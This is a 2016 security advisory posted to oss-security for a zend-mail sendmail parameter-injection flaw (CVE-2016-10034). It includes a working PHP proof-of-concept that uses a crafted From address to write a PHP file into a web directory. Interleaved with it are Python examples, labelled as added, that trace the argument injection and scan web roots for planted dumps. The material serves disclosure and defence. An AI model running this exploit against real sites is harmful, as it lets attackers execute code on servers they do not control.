Date: Fri, 30 Dec 2016 14:02:07 -0200
From: Dawid Golunski <dawid@...alhackers.com>
To: oss-security@...ts.openwall.com
Subject: Zend Framework (zend-mail) < 2.4.11 Remote Code Execution (CVE-2016-10034)

Zend Framework / zend-mail < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.7.2

Discovered by Dawid Golunski (@...id_golunski)
https://legalhackers.com

Desc:
Independent research uncovered a critical vulnerability in zend-mail, a
Zend Framework component, that could potentially be used by (unauthenticated)
remote attackers to achieve arbitrary remote code execution in the context
of the web server user and remotely compromise the target web application.

To exploit the vulnerability, an attacker could target common website
components such as contact/feedback forms, registration forms, password-reset
emails and other features that send out email with the help of a vulnerable
version of the zend-mail component.

The latest full advisory / PoC exploit at:

http://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html

Video / PoC:

https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html

For updates, follow:

https://twitter.com/dawid_golunski


--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski






    __                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
           /____/                                                   




=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10034
- Release date:  30.12.2016
- Last revision: 30.12.2016
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 


II. BACKGROUND
-------------------------


"Zend Framework is a collection of professional PHP packages with more than 95
million installations. It can be used to develop web applications and 
services using PHP 5.6+, and provides 100% object-oriented code using a broad 
spectrum of language features.

Zend Framework 3 evolved from both Zend Framework 2 and 1; cumulatively, 
the previous versions were downloaded more than 15 million times.

The principal sponsor of Zend Framework is Zend, a Rogue Wave Company, but 
many others have contributed components or significant features to the 
framework. Companies such as Google, Microsoft, and StrikeIron have 
partnered with Zend to provide interfaces to web services and other 
technologies they wish to make available to ZF developers."

https://framework.zend.com/about

https://github.com/zendframework/zendframework

III. INTRODUCTION
-------------------------

Independent research uncovered a critical vulnerability in zend-mail, a
Zend Framework component, that could potentially be used by (unauthenticated)
remote attackers to achieve arbitrary remote code execution in the context
of the web server user and remotely compromise the target web application.

To exploit the vulnerability, an attacker could target common website
components such as contact/feedback forms, registration forms, password-reset
emails and other features that send out email with the help of a vulnerable
version of the zend-mail component.

Note: This advisory is limited.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.

IV. DESCRIPTION
-------------------------

The zend-mail component of Zend Framework suffers from the same class of
vulnerability as the ones disclosed in PHPMailer and SwiftMailer:

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

If a web application based on Zend Framework passes untrusted input to the
setFrom() method of a Zend\Mail\Message that is then sent through zend-mail's
Sendmail transport, an attacker could inject additional parameters into the
sendmail command line.

By placing an escaped quote (\") after the first word of a quoted local part,
the following email address:

"Attacker \" -Param2 -Param3"@...t.com

when passed to zend-mail's Sendmail transport (and eventually to PHP's mail()
function, whose additional-parameters string is built from the sender address)
would cause sendmail to execute with the following arguments (shown here in
the generic mail() -f layout; the transport's own layout, with a separate -r
argument, appears in the PoC section below):

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@...t.com]


As can be seen, arguments 4 and 5 are injected into the sendmail invocation
as additional parameters.


Attackers can exploit this to achieve code execution as shown in the PoC
below.
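The parameter-injection path described above, traced end to end as an added
example (this is not code from the advisory or from zend-mail). It models what
the text describes: the transport appends the sender address to a sendmail
parameter string, PHP's mail() passes that string through escapeshellcmd()
(documented behaviour) and runs it via popen(), and /bin/sh tokenizes it into
sendmail's argv. Python's shlex.split() stands in for /bin/sh;
php_escapeshellcmd() and php_escapeshellarg() are ports of PHP's POSIX
behaviour; the "-r <addr>" layout is taken from the PoC's argv listing on this
page (an assumption about the transport, not verified against its source), and
the glued "-f<addr>" layout is the generic mail() case. The sample addresses and
domains are constructed here. is_safe_sender() is the boundary check an
application should apply to form input; it is deliberately narrower than
RFC 5322.

```python
"""Trace a crafted sender address from setFrom() to sendmail's argv.

Added example, not code from the advisory or from zend-mail.  Modelled path:
transport builds "<flag><from address>" -> PHP mail() applies escapeshellcmd()
to it -> popen() runs "sendmail_path <params>" through /bin/sh -> sendmail argv.
shlex.split() stands in for /bin/sh.
"""
import re
import shlex

SENDMAIL_PATH = "/usr/sbin/sendmail -t -i"   # PHP's default sendmail_path

# Characters escapeshellcmd() always prefixes with a backslash (POSIX builds).
_ALWAYS_ESCAPED = frozenset('#&;`|*?~<>^()[]{}$\\\n\xff')


def php_escapeshellcmd(s: str) -> str:
    """Port of PHP's escapeshellcmd(): metacharacters (backslash included) are
    escaped; a quote is escaped only when it has no later partner quote."""
    out = []
    partner = None          # index of the quote expected to close the open pair
    for i, ch in enumerate(s):
        if ch in '"\'':
            if partner is None:
                j = s.find(ch, i + 1)
                if j == -1:
                    out.append('\\')    # unpaired quote: escape it
                else:
                    partner = j         # paired quote: emitted verbatim
            elif s[partner] == ch:
                partner = None          # closing half of the pair: verbatim
            else:
                out.append('\\')        # quote of the other kind inside a pair
            out.append(ch)
        elif ch in _ALWAYS_ESCAPED:
            out.append('\\' + ch)
        else:
            out.append(ch)
    return ''.join(out)


def php_escapeshellarg(s: str) -> str:
    """Port of PHP's escapeshellarg() on POSIX: single-quote the whole value."""
    return "'" + s.replace("'", "'\\''") + "'"


def sendmail_argv(extra_params: str) -> list:
    """argv that /bin/sh hands to sendmail when mail() gets extra_params."""
    return shlex.split(SENDMAIL_PATH + ' ' + php_escapeshellcmd(extra_params))


def argv_for_from(from_addr: str, layout: str = '-r ') -> list:
    """Build the parameter string the way a sendmail transport would and return
    the resulting argv.  layout='-r ' gives the separate -r argument seen in the
    PoC listing (assumed from that listing); layout='-f' gives the glued
    mail()-style -f<address> of the generic example."""
    return sendmail_argv(layout + from_addr)


# Boundary check for sender addresses taken from forms.  Deliberately narrower
# than RFC 5322: quoted local parts, whitespace, backslashes and shell
# metacharacters are all refused, so nothing that can split an argument passes.
_SAFE_ADDR = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+')


def is_safe_sender(addr: str) -> bool:
    return _SAFE_ADDR.fullmatch(addr) is not None


# Constructed sample addresses (the advisory's own have the domain elided).
GENERIC_ADDR = '"Attacker \\" -Param2 -Param3"@test.com'
POC_ADDR = '"attacker\\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@example.com'
BENIGN_ADDR = 'alice@example.com'

if __name__ == '__main__':
    for addr in (BENIGN_ADDR, GENERIC_ADDR, POC_ADDR):
        print(f"safe={is_safe_sender(addr)!s:5} argv={argv_for_from(addr)}")
    # Same PoC address wrapped escapeshellarg()-style: one argument, no injection,
    # but the value is mangled by mail()'s second escaping pass.
    print(argv_for_from(php_escapeshellarg(POC_ADDR)))
```

Running it shows the PoC address fanning out into separate -oQ and -X
arguments (the argv listing in the PoC section), while the same address wrapped
in escapeshellarg()-style quoting stays a single argument but comes out mangled
by the second escaping pass inside mail(). That layering of two escapers is the
kind of interaction behind the PHPMailer patch-bypass advisory (CVE-2016-10045)
listed in the references; rejecting such addresses at the form boundary is the
check that does not depend on it.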



V. PROOF OF CONCEPT EXPLOIT
-------------------------

<?php
 
/*
 
Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html



Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (tested against the Sendmail MTA).

It injects the following parameters into the sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@...il.com]

This makes sendmail write its transfer log (-X) to /var/www/cache/phpcode.php
(-oQ/tmp/ sets the queue directory to a location the web server user can write
to). Note that /var/www/cache must be writable by the www-data web user.

The resulting file will contain the payload passed in the body of the message:

09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 

See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from an untrusted source such as $_GET, $_POST etc.,
// for example the sender and body fields of a contact form.

$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@...il.com';
// base64-encoded "<?php phpinfo(); ?>"
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");

// ------------------

// mail() parameter injection via the vulnerability in zend-mail

// Bootstrap the Zend Framework 2 application (paths follow the ZF2 skeleton
// layout; adjust them for the target install).
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

// Build the message; the crafted From address ends up in the sendmail
// parameter string assembled by the Sendmail transport.
$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@...alhost', 'Support');
$message->setSubject('Zend PoC');

// Send through the (vulnerable) Sendmail transport, which hands the
// parameters to PHP's mail().
$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);





~~~~~~~~~~~

Video PoC:
~~~~~~~~~~~~~

https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html
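The artifact the PoC leaves behind is a sendmail -X transfer log whose every
line starts with the sendmail PID and a direction marker, as in the phpcode.php
listing above; the PHP engine ignores those prefixes and runs whatever sits
between the open and close tags. The scanner below, an added example that is
not part of the advisory, walks a served directory and flags files with that
line shape that also carry PHP code or a server-side extension. The sample web
root, its file names and the planted dump are constructed here.

```python
"""Hunt for sendmail -X trace dumps planted under a web root.

Added example, not code from the advisory.  sendmail's -X writes a traffic log
in which every line starts with the sendmail PID and a direction marker
("<<<" for data it received, ">>>" for data it sent).  When that log lands in
a served directory under a .php name, the message body becomes executable.
"""
import os
import re
import shutil
import tempfile

TRACE_LINE = re.compile(rb'^\d+ (<<<|>>>)( |$)')
PHP_OPEN_TAG = re.compile(rb'<\?(php\b|=)', re.IGNORECASE)
SERVER_SIDE_EXT = ('.php', '.phtml', '.php5', '.phar')


def classify_file(path: str, min_trace_lines: int = 3) -> dict:
    """Describe one file: how many lines look like -X trace lines, whether
    that is enough to call it a dump, and whether it carries a PHP open tag."""
    with open(path, 'rb') as fh:
        data = fh.read()
    trace = sum(1 for line in data.splitlines() if TRACE_LINE.match(line))
    return {
        'path': path,
        'trace_lines': trace,
        'is_trace_dump': trace >= min_trace_lines,
        'has_php': PHP_OPEN_TAG.search(data) is not None,
    }


def scan_webroot(root: str) -> list:
    """Return every -X dump under root that either contains PHP or carries a
    server-side extension; neither should ever exist in a served directory."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            info = classify_file(os.path.join(dirpath, name))
            if info['is_trace_dump'] and (
                    info['has_php'] or name.lower().endswith(SERVER_SIDE_EXT)):
                hits.append(info)
    return hits


# Constructed sample: the dump the PoC would leave behind, plus a benign file.
SAMPLE_DUMP = (
    b"09607 <<< Content-Type: text/html; charset=us-ascii\n"
    b"09607 <<< \n"
    b"09607 <<< <?php phpinfo(); ?>\n"
    b"09607 <<< \n"
)


def demo() -> list:
    """Build a throwaway web root, plant the dump, scan, clean up, return hits."""
    root = tempfile.mkdtemp(prefix='webroot-')
    try:
        os.makedirs(os.path.join(root, 'cache'))
        with open(os.path.join(root, 'cache', 'phpcode.php'), 'wb') as fh:
            fh.write(SAMPLE_DUMP)
        with open(os.path.join(root, 'index.php'), 'wb') as fh:
            fh.write(b"<?php echo 'hello'; ?>\n")
        return scan_webroot(root)
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for hit in demo():
        print(hit)
```

Point scan_webroot() at the document root and at any directory the web server
user can write to (upload and cache directories are the usual candidates); a
legitimate PHP file never has the PID-prefixed line shape, so the only expected
hits are planted dumps.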



VI. BUSINESS IMPACT
-------------------------

Successful exploitation could let remote attackers gain access to the target
server in the context of the web server account, which could lead to a full
compromise of the web application.

 
VII. SYSTEMS AFFECTED
-------------------------

Affected (as listed in section I): zend-mail < 2.4.11, zend-mail < 2.7.2, and
Zend Framework < 2.4.11.

The patch resolving the vulnerability is available in:

zend-mail 2.7.2 and later
zend-mail 2.4.11
Zend Framework 2.4.11


VIII. SOLUTION / VENDOR RESPONSE
-------------------------

Update to a version that contains the patch (see section VII). Vendor advisory:

https://framework.zend.com/security/advisory/ZF2016-04


IX. REFERENCES
-------------------------

https://legalhackers.com

This / CVE-2016-10034 advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html

Video PoC:
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html

Exploit code:
The simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10034/zend-mail_PoC_RCE_Exploit.txt

Other exploits with other attack vectors will be disclosed at a later date to 
allow more time for patching.

CVE-2016-10034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10034

Vendor site:
https://framework.zend.com


Related vulnerabilities (found in PHPMailer & SwiftMailer):

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com


Thanks to Beyond Security's SSD program for help with the disclosure to the vendor.
 
XI. REVISION HISTORY
-------------------------

30.12.2016 - Limited advisory released
 

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.




